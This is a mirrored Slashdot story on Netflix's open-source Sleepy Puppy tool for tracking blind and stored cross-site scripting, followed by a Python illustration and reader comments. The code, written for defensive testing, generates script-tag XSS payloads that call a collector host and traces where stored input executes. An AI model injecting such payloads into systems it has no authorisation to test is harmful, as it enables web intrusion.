Slashdot Mirror


Netflix Open Sources Sleepy Puppy XSS Hunter

msm1267 writes: Netflix has released a tool it calls Sleepy Puppy. The tool injects cross-site scripting payloads into a target app that may not be vulnerable, but could be stored in a database and tracks the payload if it's reflected to a secondary application that makes use of the data in the same field. "We were looking for a way to provide coverage on applications that come from different origins or may not be publicly accessible," said co-developer Scott Behrens, a senior application security engineer at Netflix. "We also wanted to observe where stored data gets reflected back, and how data that may be stored publicly could also be reflected in a large number of internal applications." Sleepy Puppy is available on Netflix's Github repository and is one of a slew of security tools its engineers have released to open source.
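The mechanism the summary describes (hand out a unique, trackable payload per injection point, store it, then find out where it is later rendered and executed) can be shown end to end in a few dozen lines. The following is an added example for this page, not Netflix's Sleepy Puppy code: the collector host `collector.example`, the `/x/<token>.js` beacon format, the `PayloadTracker` class and the three simulated consumer apps are all assumptions constructed for the illustration.

```python
"""Blind/stored XSS tracking, in the spirit of the tool described above.

Added illustration, not the project's own code. The collector host, token
format and the simulated applications below are assumptions.
"""
import html
import re
import secrets
from dataclasses import dataclass
from urllib.parse import urlparse

# Assumed beacon host; a real deployment configures its own callback origin.
COLLECTOR = "https://collector.example"


@dataclass
class Injection:
    token: str
    target: str       # app/form where the payload was submitted
    field_name: str   # which stored field carries it
    payload: str


@dataclass
class Callback:
    token: str
    origin: str       # page that actually executed the payload
    referer: str


class PayloadTracker:
    """Hands out per-injection payloads and correlates beacon hits back to them."""

    def __init__(self):
        self.injections = {}   # token -> Injection
        self.callbacks = []    # every confirmed execution

    def new_payload(self, target, field_name):
        # A distinct token per injection point is what makes later correlation possible.
        token = secrets.token_hex(4)
        payload = f'<script src="{COLLECTOR}/x/{token}.js"></script>'
        self.injections[token] = Injection(token, target, field_name, payload)
        return payload

    def record_callback(self, url, origin, referer=""):
        """Called when the collector receives a request for a payload script."""
        m = re.fullmatch(r"/x/([0-9a-f]+)\.js", urlparse(url).path)
        if not m or m.group(1) not in self.injections:
            return None   # malformed or unknown token: ignore
        cb = Callback(m.group(1), origin, referer)
        self.callbacks.append(cb)
        return cb

    def report(self):
        """(where injected, field, where it executed) for each confirmed reflection."""
        return sorted({
            (self.injections[cb.token].target,
             self.injections[cb.token].field_name,
             cb.origin)
            for cb in self.callbacks
        })


# --- Constructed simulation of the pipeline: primary app -> shared DB -> consumers ---

SCRIPT_SRC = re.compile(r'<script src="([^"]+)"></script>')


def browser_visits(tracker, page_origin, rendered_html):
    """Stand-in for a browser: any surviving script tag is fetched from the collector."""
    hits = []
    for src in SCRIPT_SRC.findall(rendered_html):
        if src.startswith(COLLECTOR):
            cb = tracker.record_callback(src, page_origin, referer=page_origin)
            if cb:
                hits.append(cb)
    return hits


def run_simulation():
    tracker = PayloadTracker()
    store = {}   # shared database: field -> stored value

    # The public app accepts the payload and stores it; it may escape on its own output.
    store["display_name"] = tracker.new_payload("public-profile", "display_name")

    # Three consumers of the same field. Only the one that reflects it raw fires the beacon.
    consumers = {
        "https://public.example":  lambda v: f"<p>{html.escape(v)}</p>",      # escaped
        "https://admin.internal":  lambda v: f"<td>{v}</td>",                 # raw reflection
        "https://report.internal": lambda v: f"<h1>{html.escape(v)}</h1>",    # escaped
    }
    for origin, render in consumers.items():
        browser_visits(tracker, origin, render(store["display_name"]))
    return tracker.report()


if __name__ == "__main__":
    for target, fld, origin in run_simulation():
        print(f"payload injected at {target}.{fld} executed on {origin}")
```

Running it reports a single hit: the payload submitted through the public profile form executed on `https://admin.internal`, the one consumer that rendered the stored field without escaping. Two caveats a practitioner would add: a `<script src>` beacon only fires when the stored value lands in an HTML body context with script execution allowed, so a quiet collector does not prove the sink is safe (attribute, JavaScript-string and CSP-restricted contexts need different payloads); and because the injected value persists in the shared database, the collector must accept callbacks for a long time and the payloads must be harmless enough to leave in production data.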

12 comments

  1. oOo by Anonymous Coward · · Score: 0

    Can a similar method be used to detect NSA style snooping?

    1. Re: oOo by Anonymous Coward · · Score: 1

      More like Snoopy Puppy, amirite?

  2. Correct Me If I Am Wrong, But by zenlessyank · · Score: 0

    Does this mean they can inject their own data into a secure (or non-secure, for that matter) data stream, then track the injected data to see where else it might go? Sounds fishy and/or evil.

    1. Re:Correct Me If I Am Wrong, But by taustin · · Score: 3, Informative

      Er, no. The summary is, as usual on /., largely unrelated to the actual article.

      It is apparently (the article is a little fuzzy, too) a tool for people designing web sites to track cross-site scripting, to look for vulnerabilities. This is a good thing. I think.

    2. Re:Correct Me If I Am Wrong, But by Anonymous Coward · · Score: 0

      No, they pretty much hit the nail on the head.
      The program injects an "alert" message into a bunch of DB entries just to see if they are being used later by other programs.

    3. Re:Correct Me If I Am Wrong, But by erapert · · Score: 1

      the program injects an "alert" message into a bunch of DB entries just to see if they are being used later by other websites.

      Fixed that for you.

  3. Maybe next... by Anonymous Coward · · Score: 0

    they should figure out how to create a UI that isn't garbage.

  4. Lets call apps apps and websites websites by Anonymous Coward · · Score: 0

    injects cross-site scripting payloads into a target app

    It is not an app. It is a website.

    The fact that there is so much ajax junk that tries to make a website look like an app doesn't mean it isn't a website.

    1. Re:Lets call apps apps and websites websites by Anonymous Coward · · Score: 0

      But what about websites with apps as a front-end? Did you validate all the app input too? My understanding is that this tool's purpose is to inject as much as it can into whatever APIs it can use, then scrape everything and see what comes out, so when data comes in an app and goes out on the website, you can see if you've introduced an exploitable situation where XSS could work.

  5. Names by wonkey_monkey · · Score: 1

    Netflix has released a tool it calls Sleepy Puppy.

    Whatever happened to names that were at least tangentially related to the function of the software?

    --
    systemd is Roko's Basilisk.

  6. Actual Code by TFlan91 · · Score: 1

    Link to the actual repo:

    https://github.com/Netflix/sle...

  7. API by OakDragon · · Score: 1

    I wish they would bring back the API to access their catalog data.